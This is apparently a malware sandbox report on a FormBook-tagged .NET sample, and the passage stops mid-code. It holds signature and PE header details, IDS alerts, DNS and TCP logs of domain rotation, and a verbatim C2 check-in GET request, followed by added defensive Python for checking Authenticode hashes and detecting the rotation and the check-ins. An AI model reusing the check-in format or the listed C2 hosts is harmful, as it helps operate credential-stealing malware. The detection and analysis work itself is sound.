                                                  Signature Validation Error:The digital signature of the object did not verify
                                                  Error Number:-2146869232
Not Before, Not After:13/11/2018 01:00:00, 09/11/2021 00:59:59
Subject Chain:CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                  Version:3
                                                  Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                  Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                  Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                  Serial:7C1118CBBADC95DA3752C46E47A27438
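The signature fields above are the security-relevant part of the static summary: the certificate table is present and the subject is a third party's code-signing certificate (the PuTTY author's, issued by COMODO) that expired in November 2021, while the PE timestamp is May 2024 and Windows reports that the digest "did not verify". A signature that is present but does not verify means the PKCS#7 SignedData carries a PE hash that is not the hash of this file, which is what a certificate table copied onto a different binary looks like. The block below is an added example written for this page, not tooling from Joe Sandbox; it recomputes the Authenticode PE hash (the value a valid SignedData for this file would have to contain) with only the standard library, checks that the certificate table sits at the end of the file as the report's security directory does (0xa1600 + 0x3608 = 0xa4c08 = 674'824 bytes), and demonstrates on a constructed minimal PE that appending a certificate table and rewriting the CheckSum leaves that hash unchanged. It does not parse the PKCS#7 blob itself (that needs an ASN.1 parser); comparing the computed hash with the digest inside SpcIndirectDataContent is the step a tool such as signtool or osslsigncode performs and the step that fails on this sample.

```python
import hashlib
import struct

SECURITY_DIR_INDEX = 4          # IMAGE_DIRECTORY_ENTRY_SECURITY
OPT_SIZE_OF_HEADERS = 60        # offsets inside the optional header, same for PE32 and PE32+
OPT_CHECKSUM = 64


def pe_layout(data: bytes) -> dict:
    """Find the header fields Authenticode skips, the section raw ranges and the certificate table."""
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    num_sections, = struct.unpack_from("<H", data, coff + 2)
    opt_size, = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20
    magic, = struct.unpack_from("<H", data, opt)
    dirs = opt + (96 if magic == 0x10B else 112)        # data directories: PE32 vs PE32+
    sec_dir = dirs + SECURITY_DIR_INDEX * 8
    cert_off, cert_size = struct.unpack_from("<II", data, sec_dir)   # a file offset, not an RVA
    size_of_headers, = struct.unpack_from("<I", data, opt + OPT_SIZE_OF_HEADERS)
    sections = []
    table = opt + opt_size
    for i in range(num_sections):
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + i * 40 + 16)
        if raw_size:
            sections.append((raw_ptr, raw_size))
    return {"checksum_off": opt + OPT_CHECKSUM, "sec_dir": sec_dir, "cert_off": cert_off,
            "cert_size": cert_size, "size_of_headers": size_of_headers, "sections": sections}


def authenticode_hash(data: bytes, algo: str = "sha256") -> str:
    """PE image hash as the Authenticode spec defines it: everything except the CheckSum field,
    the security directory entry and the certificate table itself."""
    lay = pe_layout(data)
    h = hashlib.new(algo)
    h.update(data[:lay["checksum_off"]])
    h.update(data[lay["checksum_off"] + 4:lay["sec_dir"]])
    h.update(data[lay["sec_dir"] + 8:lay["size_of_headers"]])
    hashed = lay["size_of_headers"]
    for raw_ptr, raw_size in sorted(lay["sections"]):   # sections in file order
        h.update(data[raw_ptr:raw_ptr + raw_size])
        hashed += raw_size
    trailing = len(data) - hashed - lay["cert_size"]     # overlay data that is not the cert table
    if trailing > 0:
        h.update(data[hashed:hashed + trailing])
    return h.hexdigest()


def inspect(data: bytes) -> dict:
    """Triage view: where the certificate table sits and which hash the signature must cover."""
    lay = pe_layout(data)
    return {
        "cert_offset": lay["cert_off"],
        "cert_size": lay["cert_size"],
        # A well-formed signed PE ends with its certificate table; the report's sample does:
        # 0xa1600 + 0x3608 == 0xa4c08 == 674824 bytes, the file size.
        "cert_at_eof": lay["cert_size"] > 0 and lay["cert_off"] + lay["cert_size"] == len(data),
        "authenticode_sha256": authenticode_hash(data),
    }


def build_minimal_pe() -> bytes:
    """Constructed sample input: a tiny unsigned PE32 with one .text section (not a real binary)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                        # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)  # i386, 1 section, PE32 opt hdr
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)                        # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                      # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)                # Section / File alignment
    struct.pack_into("<I", opt, 56, 0x2000)                        # SizeOfImage
    struct.pack_into("<I", opt, OPT_SIZE_OF_HEADERS, 0x200)
    struct.pack_into("<H", opt, 68, 2)                             # Subsystem: Windows GUI
    struct.pack_into("<I", opt, 92, 16)                            # NumberOfRvaAndSizes
    section = struct.pack("<8sIIIIIIHHI", b".text", 0x10, 0x1000, 0x200, 0x200,
                          0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + section).ljust(0x200, b"\0")
    return headers + bytes(range(256)) * 2                         # 0x200 bytes of "code"


def attach_certificate(pe: bytes, pkcs7_blob: bytes) -> bytes:
    """Append a WIN_CERTIFICATE entry and point the security directory at it, as a signing tool does.
    The CheckSum is rewritten too, to show that it does not influence the Authenticode hash."""
    lay = pe_layout(pe)
    body = pkcs7_blob.ljust((len(pkcs7_blob) + 7) & ~7, b"\0")    # entries are 8-byte aligned
    entry = struct.pack("<IHH", 8 + len(body), 0x0200, 0x0002) + body  # revision 2.0, PKCS#7
    out = bytearray(pe)
    struct.pack_into("<II", out, lay["sec_dir"], len(pe), len(entry))
    struct.pack_into("<I", out, lay["checksum_off"], 0xDEADBEEF)
    return bytes(out) + entry


if __name__ == "__main__":
    unsigned = build_minimal_pe()
    signed = attach_certificate(unsigned, b"\x30\x82" + b"\x11" * 200)  # placeholder, not real PKCS#7
    print(inspect(unsigned))
    print(inspect(signed))   # same authenticode_sha256: the value a genuine SignedData would carry
```

Run the hash over a real sample with `authenticode_hash(open(path, "rb").read())` and compare it with the digest your signature tool extracts; a mismatch, as Windows reports here, means the certificate table was not produced over this file's contents, regardless of who the certificate belongs to.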
Instruction (disassembly at the entry point 0x4a2842; only the first instruction is native code: it jumps through the IAT at 0x402000, RVA 0x2000, to the imported mscoree!_CorExeMain, the standard stub of a .NET executable. The bytes that follow are not x86 code and disassemble as junk.)
jmp dword ptr [00402000h]
or al, byte ptr [eax]
add byte ptr [eax], al
xor al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr fs:[eax], al
add ah, dh
add dword ptr [eax], eax
add al, ch
add eax, dword ptr [eax]
add al, dl
pop es
add byte ptr [eax], al
mov byte ptr [ebx], dl
add byte ptr [eax], al  (this line, the decoding of two zero bytes, is repeated 84 more times in the report: the rest of the disassembled window is zero padding)
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xa27ef          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xa4000          0x694         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0xa1600          0x3608        (file offset, not an RVA; 0xa1600 + 0x3608 = 0xa4c08 = the 674'824-byte file size)
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xa6000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xa032c          0x54          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0xa0868       0xa0a00   f189f8656cd460aa54cda17f8eb91c13  False     0.9559870500972762  data       7.965298829702422    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xa4000          0x694         0x800     d8e7bca23a395eb59e077c61fb5f9c3e  False     0.3662109375        data       3.6315960781360115   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xa6000          0xc           0x200     beee201bcfd8a8289801fa229ca81670  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size   Type                                                                              Language  Country  ZLIB Complexity
RT_VERSION   0xa4090  0x404  data                                                                              -         -        0.4280155642023346
RT_MANIFEST  0xa44a4  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators  -         -        0.5489795918367347

DLL          Import
mscoree.dll  _CorExeMain
Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP    Dest IP
07/03/24-14:51:07.057746  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49720        80         192.168.2.5  199.59.243.226
07/03/24-14:53:09.934739  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49724        80         192.168.2.5  52.60.87.163
07/03/24-14:53:30.424657  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49725        80         192.168.2.5  34.92.194.225
07/03/24-14:53:50.846445  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49726        80         192.168.2.5  3.33.130.190
07/03/24-14:52:08.288538  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49722        80         192.168.2.5  34.149.87.45
07/03/24-14:51:27.802913  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49721        80         192.168.2.5  14.128.41.165
07/03/24-14:52:28.804978  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49723        80         192.168.2.5  3.33.130.190
07/03/24-14:50:47.686112  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49719        80         192.168.2.5  162.244.93.3
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Jul 3, 2024 14:50:47.681068897 CEST  49719        80         192.168.2.5     162.244.93.3
Jul 3, 2024 14:50:47.685971022 CEST  80           49719      162.244.93.3    192.168.2.5
Jul 3, 2024 14:50:47.686041117 CEST  49719        80         192.168.2.5     162.244.93.3
Jul 3, 2024 14:50:47.686111927 CEST  49719        80         192.168.2.5     162.244.93.3
Jul 3, 2024 14:50:47.691078901 CEST  80           49719      162.244.93.3    192.168.2.5
Jul 3, 2024 14:50:48.172086954 CEST  49719        80         192.168.2.5     162.244.93.3
Jul 3, 2024 14:50:48.179862976 CEST  80           49719      162.244.93.3    192.168.2.5
Jul 3, 2024 14:50:48.179924965 CEST  49719        80         192.168.2.5     162.244.93.3
Jul 3, 2024 14:51:07.052643061 CEST  49720        80         192.168.2.5     199.59.243.226
Jul 3, 2024 14:51:07.057593107 CEST  80           49720      199.59.243.226  192.168.2.5
Jul 3, 2024 14:51:07.057656050 CEST  49720        80         192.168.2.5     199.59.243.226
Jul 3, 2024 14:51:07.057745934 CEST  49720        80         192.168.2.5     199.59.243.226
Jul 3, 2024 14:51:07.062591076 CEST  80           49720      199.59.243.226  192.168.2.5
Jul 3, 2024 14:51:07.511368990 CEST  80           49720      199.59.243.226  192.168.2.5
Jul 3, 2024 14:51:07.511396885 CEST  80           49720      199.59.243.226  192.168.2.5
Jul 3, 2024 14:51:07.511569023 CEST  49720        80         192.168.2.5     199.59.243.226
Jul 3, 2024 14:51:07.511569023 CEST  49720        80         192.168.2.5     199.59.243.226
Jul 3, 2024 14:51:07.511851072 CEST  80           49720      199.59.243.226  192.168.2.5
Jul 3, 2024 14:51:07.511935949 CEST  49720        80         192.168.2.5     199.59.243.226
Jul 3, 2024 14:51:07.517030001 CEST  80           49720      199.59.243.226  192.168.2.5
Jul 3, 2024 14:51:27.794821024 CEST  49721        80         192.168.2.5     14.128.41.165
Jul 3, 2024 14:51:27.799916983 CEST  80           49721      14.128.41.165   192.168.2.5
Jul 3, 2024 14:51:27.802818060 CEST  49721        80         192.168.2.5     14.128.41.165
Jul 3, 2024 14:51:27.802912951 CEST  49721        80         192.168.2.5     14.128.41.165
Jul 3, 2024 14:51:27.807775021 CEST  80           49721      14.128.41.165   192.168.2.5
Jul 3, 2024 14:51:28.315493107 CEST  49721        80         192.168.2.5     14.128.41.165
Jul 3, 2024 14:51:28.368556023 CEST  80           49721      14.128.41.165   192.168.2.5
Jul 3, 2024 14:51:28.380311012 CEST  80           49721      14.128.41.165   192.168.2.5
Jul 3, 2024 14:51:28.383835077 CEST  49721        80         192.168.2.5     14.128.41.165
Jul 3, 2024 14:52:08.281238079 CEST  49722        80         192.168.2.5     34.149.87.45
Jul 3, 2024 14:52:08.286168098 CEST  80           49722      34.149.87.45    192.168.2.5
Jul 3, 2024 14:52:08.288537979 CEST  49722        80         192.168.2.5     34.149.87.45
Jul 3, 2024 14:52:08.288537979 CEST  49722        80         192.168.2.5     34.149.87.45
Jul 3, 2024 14:52:08.293364048 CEST  80           49722      34.149.87.45    192.168.2.5
Jul 3, 2024 14:52:08.758635044 CEST  80           49722      34.149.87.45    192.168.2.5
Jul 3, 2024 14:52:08.758776903 CEST  49722        80         192.168.2.5     34.149.87.45
Jul 3, 2024 14:52:08.758829117 CEST  80           49722      34.149.87.45    192.168.2.5
Jul 3, 2024 14:52:08.758928061 CEST  49722        80         192.168.2.5     34.149.87.45
Jul 3, 2024 14:52:08.763606071 CEST  80           49722      34.149.87.45    192.168.2.5
Jul 3, 2024 14:52:28.799663067 CEST  49723        80         192.168.2.5     3.33.130.190
Jul 3, 2024 14:52:28.804783106 CEST  80           49723      3.33.130.190    192.168.2.5
Jul 3, 2024 14:52:28.804860115 CEST  49723        80         192.168.2.5     3.33.130.190
Jul 3, 2024 14:52:28.804977894 CEST  49723        80         192.168.2.5     3.33.130.190
Jul 3, 2024 14:52:28.809865952 CEST  80           49723      3.33.130.190    192.168.2.5
Jul 3, 2024 14:52:29.270483971 CEST  80           49723      3.33.130.190    192.168.2.5
Jul 3, 2024 14:52:29.270582914 CEST  80           49723      3.33.130.190    192.168.2.5
Jul 3, 2024 14:52:29.270631075 CEST  49723        80         192.168.2.5     3.33.130.190
Jul 3, 2024 14:52:29.270689964 CEST  49723        80         192.168.2.5     3.33.130.190
Jul 3, 2024 14:52:29.275525093 CEST  80           49723      3.33.130.190    192.168.2.5
Jul 3, 2024 14:53:50.841384888 CEST  49726        80         192.168.2.5     3.33.130.190
Jul 3, 2024 14:53:50.846333981 CEST  80           49726      3.33.130.190    192.168.2.5
Jul 3, 2024 14:53:50.846405983 CEST  49726        80         192.168.2.5     3.33.130.190
Jul 3, 2024 14:53:50.846445084 CEST  49726        80         192.168.2.5     3.33.130.190
Jul 3, 2024 14:53:50.851325035 CEST  80           49726      3.33.130.190    192.168.2.5
Jul 3, 2024 14:53:51.307919025 CEST  80           49726      3.33.130.190    192.168.2.5
Jul 3, 2024 14:53:51.308060884 CEST  80           49726      3.33.130.190    192.168.2.5
Jul 3, 2024 14:53:51.308078051 CEST  49726        80         192.168.2.5     3.33.130.190
Jul 3, 2024 14:53:51.308140039 CEST  49726        80         192.168.2.5     3.33.130.190
Jul 3, 2024 14:53:51.312975883 CEST  80           49726      3.33.130.190    192.168.2.5
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Jul 3, 2024 14:50:26.064101934 CEST  54001        53         192.168.2.5  1.1.1.1
Jul 3, 2024 14:50:26.083115101 CEST  53           54001      1.1.1.1      192.168.2.5
Jul 3, 2024 14:50:47.472589970 CEST  57362        53         192.168.2.5  1.1.1.1
Jul 3, 2024 14:50:47.680409908 CEST  53           57362      1.1.1.1      192.168.2.5
Jul 3, 2024 14:51:06.767313004 CEST  52104        53         192.168.2.5  1.1.1.1
Jul 3, 2024 14:51:07.051964998 CEST  53           52104      1.1.1.1      192.168.2.5
Jul 3, 2024 14:51:27.316390991 CEST  51867        53         192.168.2.5  1.1.1.1
Jul 3, 2024 14:51:27.790054083 CEST  53           51867      1.1.1.1      192.168.2.5
Jul 3, 2024 14:51:47.752373934 CEST  51117        53         192.168.2.5  1.1.1.1
Jul 3, 2024 14:51:48.121083021 CEST  53           51117      1.1.1.1      192.168.2.5
Jul 3, 2024 14:52:08.236404896 CEST  58779        53         192.168.2.5  1.1.1.1
Jul 3, 2024 14:52:08.276448965 CEST  53           58779      1.1.1.1      192.168.2.5
Jul 3, 2024 14:52:28.785418034 CEST  65273        53         192.168.2.5  1.1.1.1
Jul 3, 2024 14:52:28.798777103 CEST  53           65273      1.1.1.1      192.168.2.5
Jul 3, 2024 14:52:49.220643044 CEST  49288        53         192.168.2.5  1.1.1.1
Jul 3, 2024 14:52:49.432316065 CEST  53           49288      1.1.1.1      192.168.2.5
Jul 3, 2024 14:53:09.657294989 CEST  53318        53         192.168.2.5  1.1.1.1
Jul 3, 2024 14:53:09.922772884 CEST  53           53318      1.1.1.1      192.168.2.5
Jul 3, 2024 14:53:30.235338926 CEST  60727        53         192.168.2.5  1.1.1.1
Jul 3, 2024 14:53:30.412910938 CEST  53           60727      1.1.1.1      192.168.2.5
Jul 3, 2024 14:53:50.813308954 CEST  52600        53         192.168.2.5  1.1.1.1
Jul 3, 2024 14:53:50.840811014 CEST  53           52600      1.1.1.1      192.168.2.5
Jul 3, 2024 14:54:13.047549009 CEST  53048        53         192.168.2.5  1.1.1.1
Jul 3, 2024 14:54:13.308358908 CEST  53           53048      1.1.1.1      192.168.2.5
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                        Type            Class        DNS over HTTPS
Jul 3, 2024 14:50:26.064101934 CEST  192.168.2.5  1.1.1.1  0xe5f5    Standard query (0)  www.theburnscleanteam.com   A (IP address)  IN (0x0001)  false
Jul 3, 2024 14:50:47.472589970 CEST  192.168.2.5  1.1.1.1  0xb1d5    Standard query (0)  www.tiensbangladesh.net     A (IP address)  IN (0x0001)  false
Jul 3, 2024 14:51:06.767313004 CEST  192.168.2.5  1.1.1.1  0x7108    Standard query (0)  www.shopusuniform.com       A (IP address)  IN (0x0001)  false
Jul 3, 2024 14:51:27.316390991 CEST  192.168.2.5  1.1.1.1  0xfa4d    Standard query (0)  www.j0mui3.shop             A (IP address)  IN (0x0001)  false
Jul 3, 2024 14:51:47.752373934 CEST  192.168.2.5  1.1.1.1  0xe02f    Standard query (0)  www.cgffwelcome.com         A (IP address)  IN (0x0001)  false
Jul 3, 2024 14:52:08.236404896 CEST  192.168.2.5  1.1.1.1  0x80a9    Standard query (0)  www.dehamobilya.com         A (IP address)  IN (0x0001)  false
Jul 3, 2024 14:52:28.785418034 CEST  192.168.2.5  1.1.1.1  0x3f59    Standard query (0)  www.happyjumps.co           A (IP address)  IN (0x0001)  false
Jul 3, 2024 14:52:49.220643044 CEST  192.168.2.5  1.1.1.1  0x15e7    Standard query (0)  www.tires-book-robust.bond  A (IP address)  IN (0x0001)  false
Jul 3, 2024 14:53:09.657294989 CEST  192.168.2.5  1.1.1.1  0x5b0f    Standard query (0)  www.foton.africa            A (IP address)  IN (0x0001)  false
Jul 3, 2024 14:53:30.235338926 CEST  192.168.2.5  1.1.1.1  0x5f99    Standard query (0)  www.e2olyiab.shop           A (IP address)  IN (0x0001)  false
Jul 3, 2024 14:53:50.813308954 CEST  192.168.2.5  1.1.1.1  0x1849    Standard query (0)  www.yipicircle.life         A (IP address)  IN (0x0001)  false
Jul 3, 2024 14:54:13.047549009 CEST  192.168.2.5  1.1.1.1  0x723d    Standard query (0)  www.tempotrekstore.com      A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code      Name                         CName                        Address         Type                    Class        DNS over HTTPS
Jul 3, 2024 14:50:26.083115101 CEST  1.1.1.1    192.168.2.5  0xe5f5    Name error (3)  www.theburnscleanteam.com    none                         none            A (IP address)          IN (0x0001)  false
Jul 3, 2024 14:50:47.680409908 CEST  1.1.1.1    192.168.2.5  0xb1d5    No error (0)    www.tiensbangladesh.net      -                            162.244.93.3    A (IP address)          IN (0x0001)  false
Jul 3, 2024 14:51:07.051964998 CEST  1.1.1.1    192.168.2.5  0x7108    No error (0)    www.shopusuniform.com        -                            199.59.243.226  A (IP address)          IN (0x0001)  false
Jul 3, 2024 14:51:27.790054083 CEST  1.1.1.1    192.168.2.5  0xfa4d    No error (0)    www.j0mui3.shop              ld2.gd788.cc                 -               CNAME (Canonical name)  IN (0x0001)  false
Jul 3, 2024 14:51:27.790054083 CEST  1.1.1.1    192.168.2.5  0xfa4d    No error (0)    ld2.gd788.cc                 42ty3zme.vakcloud.com        -               CNAME (Canonical name)  IN (0x0001)  false
Jul 3, 2024 14:51:27.790054083 CEST  1.1.1.1    192.168.2.5  0xfa4d    No error (0)    42ty3zme.vakcloud.com        pa94nj5r.vakcloud.com        -               CNAME (Canonical name)  IN (0x0001)  false
Jul 3, 2024 14:51:27.790054083 CEST  1.1.1.1    192.168.2.5  0xfa4d    No error (0)    pa94nj5r.vakcloud.com        -                            14.128.41.165   A (IP address)          IN (0x0001)  false
Jul 3, 2024 14:51:48.121083021 CEST  1.1.1.1    192.168.2.5  0xe02f    Name error (3)  www.cgffwelcome.com          none                         none            A (IP address)          IN (0x0001)  false
Jul 3, 2024 14:52:08.276448965 CEST  1.1.1.1    192.168.2.5  0x80a9    No error (0)    www.dehamobilya.com          cdn1.wixdns.net              -               CNAME (Canonical name)  IN (0x0001)  false
Jul 3, 2024 14:52:08.276448965 CEST  1.1.1.1    192.168.2.5  0x80a9    No error (0)    cdn1.wixdns.net              td-ccm-neg-87-45.wixdns.net  -               CNAME (Canonical name)  IN (0x0001)  false
Jul 3, 2024 14:52:08.276448965 CEST  1.1.1.1    192.168.2.5  0x80a9    No error (0)    td-ccm-neg-87-45.wixdns.net  -                            34.149.87.45    A (IP address)          IN (0x0001)  false
Jul 3, 2024 14:52:28.798777103 CEST  1.1.1.1    192.168.2.5  0x3f59    No error (0)    www.happyjumps.co            happyjumps.co                -               CNAME (Canonical name)  IN (0x0001)  false
Jul 3, 2024 14:52:28.798777103 CEST  1.1.1.1    192.168.2.5  0x3f59    No error (0)    happyjumps.co                -                            3.33.130.190    A (IP address)          IN (0x0001)  false
Jul 3, 2024 14:52:28.798777103 CEST  1.1.1.1    192.168.2.5  0x3f59    No error (0)    happyjumps.co                -                            15.197.148.33   A (IP address)          IN (0x0001)  false
Jul 3, 2024 14:52:49.432316065 CEST  1.1.1.1    192.168.2.5  0x15e7    Name error (3)  www.tires-book-robust.bond   none                         none            A (IP address)          IN (0x0001)  false
Jul 3, 2024 14:53:09.922772884 CEST  1.1.1.1    192.168.2.5  0x5b0f    No error (0)    www.foton.africa             -                            52.60.87.163    A (IP address)          IN (0x0001)  false
Jul 3, 2024 14:53:30.412910938 CEST  1.1.1.1    192.168.2.5  0x5f99    No error (0)    www.e2olyiab.shop            googleyou.qqdns.shop         -               CNAME (Canonical name)  IN (0x0001)  false
Jul 3, 2024 14:53:30.412910938 CEST  1.1.1.1    192.168.2.5  0x5f99    No error (0)    googleyou.qqdns.shop         -                            34.92.194.225   A (IP address)          IN (0x0001)  false
Jul 3, 2024 14:53:50.840811014 CEST  1.1.1.1    192.168.2.5  0x1849    No error (0)    www.yipicircle.life          yipicircle.life              -               CNAME (Canonical name)  IN (0x0001)  false
Jul 3, 2024 14:53:50.840811014 CEST  1.1.1.1    192.168.2.5  0x1849    No error (0)    yipicircle.life              -                            3.33.130.190    A (IP address)          IN (0x0001)  false
Jul 3, 2024 14:53:50.840811014 CEST  1.1.1.1    192.168.2.5  0x1849    No error (0)    yipicircle.life              -                            15.197.148.33   A (IP address)          IN (0x0001)  false
Jul 3, 2024 14:54:13.308358908 CEST  1.1.1.1    192.168.2.5  0x723d    Name error (3)  www.tempotrekstore.com       none                         none            A (IP address)          IN (0x0001)  false
                                                  • www.tiensbangladesh.net
                                                  • www.shopusuniform.com
                                                  • www.j0mui3.shop
                                                  • www.dehamobilya.com
                                                  • www.happyjumps.co
                                                  • www.yipicircle.life
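The DNS tables above show the behaviour that matters more than any single name: the injected process resolves a fresh host roughly every 20 seconds, twelve different names in under four minutes, and moves on whether the answer is NXDOMAIN, a parked page or a live host. FormBook carries a list of mostly decoy domains next to its real C2, so the operator's server is not identifiable from this table alone, but the cadence itself is a usable network signal. The block below is an added example, not Joe Sandbox tooling: it reads the query times and names from the report's table (embedded verbatim as sample input), computes the inter-query gaps and their jitter, and flags a source that walks many distinct names at a near-constant interval. The thresholds (six distinct names, coefficient of variation at most 0.15, mean gap of at least five seconds) are my choices; the constructed browser trace is there only to show that ordinary bursty lookups do not trip it.

```python
from datetime import datetime
from statistics import mean, pstdev

# Query times and names copied from the report's DNS query table (3 Jul 2024, CEST).
REPORT_DNS_QUERIES = [
    ("14:50:26.064", "www.theburnscleanteam.com"),
    ("14:50:47.472", "www.tiensbangladesh.net"),
    ("14:51:06.767", "www.shopusuniform.com"),
    ("14:51:27.316", "www.j0mui3.shop"),
    ("14:51:47.752", "www.cgffwelcome.com"),
    ("14:52:08.236", "www.dehamobilya.com"),
    ("14:52:28.785", "www.happyjumps.co"),
    ("14:52:49.220", "www.tires-book-robust.bond"),
    ("14:53:09.657", "www.foton.africa"),
    ("14:53:30.235", "www.e2olyiab.shop"),
    ("14:53:50.813", "www.yipicircle.life"),
    ("14:54:13.047", "www.tempotrekstore.com"),
]

# Constructed contrast (not from the report): a browser resolving a few names in bursts.
BROWSER_DNS_QUERIES = [
    ("09:00:00.000", "www.example.com"),
    ("09:00:00.120", "cdn.example.com"),
    ("09:00:00.400", "www.example.com"),
    ("09:00:15.900", "api.example.com"),
    ("09:01:02.300", "www.example.com"),
]


def _seconds(ts: str) -> float:
    """Time-of-day string to seconds; the report's queries all fall on one day."""
    t = datetime.strptime(ts, "%H:%M:%S.%f")
    return t.hour * 3600 + t.minute * 60 + t.second + t.microsecond / 1e6


def rotation_profile(queries) -> dict:
    """Summarise one client's query stream: how many names, how regular the spacing."""
    times = sorted(_seconds(ts) for ts, _ in queries)
    gaps = [later - earlier for earlier, later in zip(times, times[1:])]
    names = [name for _, name in queries]
    avg = mean(gaps) if gaps else 0.0
    # Coefficient of variation: 0 means perfectly periodic, >1 means bursty.
    cv = pstdev(gaps) / avg if gaps and avg > 0 else float("inf")
    return {
        "queries": len(names),
        "unique_names": len(set(names)),
        "repeat_ratio": 1 - len(set(names)) / len(names) if names else 0.0,
        "mean_gap": avg,
        "jitter_cv": cv,
    }


def looks_like_domain_rotation(profile: dict, min_unique: int = 6,
                               max_cv: float = 0.15, min_gap: float = 5.0) -> bool:
    """Many distinct names, rarely repeated, at a steady multi-second interval."""
    return (profile["unique_names"] >= min_unique
            and profile["repeat_ratio"] <= 0.2
            and profile["mean_gap"] >= min_gap
            and profile["jitter_cv"] <= max_cv)


if __name__ == "__main__":
    for label, queries in (("report", REPORT_DNS_QUERIES), ("browser", BROWSER_DNS_QUERIES)):
        p = rotation_profile(queries)
        print(label, f"{p['unique_names']} names, mean gap {p['mean_gap']:.1f}s, "
              f"cv {p['jitter_cv']:.3f}, rotation={looks_like_domain_rotation(p)}")
```

In a resolver log, group queries by client address and run `rotation_profile` over a sliding window of a few minutes; the report's stream lands at a mean gap of about 20.6 s with a coefficient of variation near 0.03, which is far more regular than anything a user-driven application produces.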
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49719        162.244.93.3    80                1028  C:\Windows\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Jul 3, 2024 14:50:47.686111927 CEST  164                OUT        GET /cn26/?V410V=CmFgnMATfu/lD1Rd1GHYmtbpicIpwpy90rRc4LoWjy4DICrpuFEBTKor21hYt8nWF2kM&Kr=YtxTb HTTP/1.1
                                                  Host: www.tiensbangladesh.net
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
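Two things in this session are worth turning into detection logic: the request itself (a GET to a short single-directory path with one long opaque query value and one short one, `Connection: close`, no other headers), and the fact that it is sent by explorer.exe (PID 1028), a process that has no business speaking HTTP to arbitrary hosts. The block below is an added example written for this page, not a rule from the report or from Emerging Threats; it parses raw HTTP requests from a constructed list that contains the two check-ins shown in this report plus an ordinary browser request for contrast, scores each request on those traits plus the originating process, and returns the sessions worth triage. The scoring weights and the system-binary watch list are my assumptions, and the query string is split by hand because `urllib` would decode `+` to a space and corrupt the opaque value.

```python
import ntpath
import re

# Constructed sample input: the two check-ins from the report's HTTP sessions (explorer.exe,
# PID 1028) and one ordinary browser request added for contrast.
SAMPLE_SESSIONS = [
    (r"C:\Windows\explorer.exe",
     b"GET /cn26/?V410V=CmFgnMATfu/lD1Rd1GHYmtbpicIpwpy90rRc4LoWjy4DICrpuFEBTKor21hYt8nWF2kM&Kr=YtxTb HTTP/1.1\r\n"
     b"Host: www.tiensbangladesh.net\r\nConnection: close\r\n\r\n"),
    (r"C:\Windows\explorer.exe",
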